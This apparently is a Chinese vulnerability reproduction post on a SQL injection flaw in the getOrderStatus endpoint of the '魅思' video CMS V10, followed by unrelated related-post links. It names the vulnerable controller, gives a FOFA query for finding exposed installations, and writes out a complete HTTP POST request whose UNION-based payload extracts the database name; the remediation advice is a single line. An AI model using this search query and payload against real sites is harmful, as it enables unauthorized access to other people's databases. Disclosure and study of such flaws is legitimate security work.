魅思CMS getOrderStatus SQL注入漏洞复现

0x01 漏洞描述:

魅思是一款集成了视频管理、用户管理、手机端应用封装等功能的综合性视频管理系统。该系统不仅以其强大的视频管理功能、灵活的用户管理机制、便捷的手机端应用封装功能以及高安全性和现代化的界面设计,成为了市场上备受关注的视频管理系统之一。无论是对于专业的视频内容创作者还是对于需要视频管理功能的企业和个人用户来说,都是一个值得考虑的选择。

在位于 /controller/Api.php 控制器中的getOrderStatus 方法传入后直接拼接了 orderSn 变量到 where 查询中,导致漏洞产生。

0x02 影响版本:

魅思 V10

0x03 搜索语句:

Fofa:app="魅思-视频管理系统"

0x04 漏洞复现:

POST /api/getOrderStatus HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

orderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(database() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- -

0x05 修复建议:

使用预编译语句并对键入的特殊字符进行编码。

相关推荐
九河云1 小时前
AWS开启MFA,提高安全性
服务器·安全·云计算·aws
九河云1 小时前
AWS账单不支付账号会停用吗?
安全·云计算·aws
newxtc3 小时前
【知了社保-注册安全分析报告-无验证方式导致安全隐患】
人工智能·安全·web安全·网络安全·网络攻击模型·社保代缴
安红豆.4 小时前
[NewStarCTF 2023 公开赛道]Begin of PHP1
web安全·php·哈希算法·web·ctf
soso19684 小时前
【OSS安全最佳实践】对OSS内身份证图片中身份证号进行脱敏
java·前端·安全
亿林网络数据6 小时前
MySQL安全加固
mysql·安全·adb
梦 & 醒7 小时前
【CTF刷题8】2024.9.26
网络·数据库·web安全·网络安全·ctf
网络研究院11 小时前
保护您的网络:入侵检测系统 IDS 终极指南
网络·安全·web安全·技术·入侵检测系统·未来·ids